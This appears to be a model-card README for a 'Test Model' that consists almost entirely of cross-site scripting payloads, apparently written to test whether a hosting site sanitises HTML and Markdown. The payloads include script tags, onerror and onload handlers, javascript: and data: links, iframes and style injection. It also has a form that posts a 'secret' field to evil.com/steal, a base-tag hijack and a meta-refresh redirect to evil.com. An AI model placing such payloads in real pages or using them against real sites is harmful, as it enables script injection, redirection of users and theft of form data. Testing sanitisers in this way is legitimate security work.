README.md

---
license: mit
---
# Test Model

## XSS Tests

### Image onerror
<img src=x onerror=alert(1)>

### Script tag
<script>alert(document.domain)</script>

### SVG onload
<svg onload=alert(1)>

### Markdown link with javascript
[Click me](javascript:alert(1))

### Data URI link  
[Click](data:text/html,<script>alert(1)</script>)

### HTML entities
<img src=&quot;x&quot; onerror=&quot;alert(1)&quot;>

### Iframe
<iframe src=javascript:alert(1)>

### Object tag
<object data=javascript:alert(1)>

### Embed
<embed src=javascript:alert(1)>

### Base tag (could redirect relative URLs)
<base href=https://evil.com>

### Form action
<form action=https://evil.com/steal><input type=text name=secret><button>Submit</button></form>

### Meta refresh
<meta http-equiv=refresh content="0;url=https://evil.com">

### Markdown with HTML
<details><summary>Click to expand</summary><img src=x onerror=alert(1)></details>

### Style injection
<div style="background:url(javascript:alert(1))">test</div>

### Event handlers in attributes
<div onmouseover="alert(1)">hover me</div>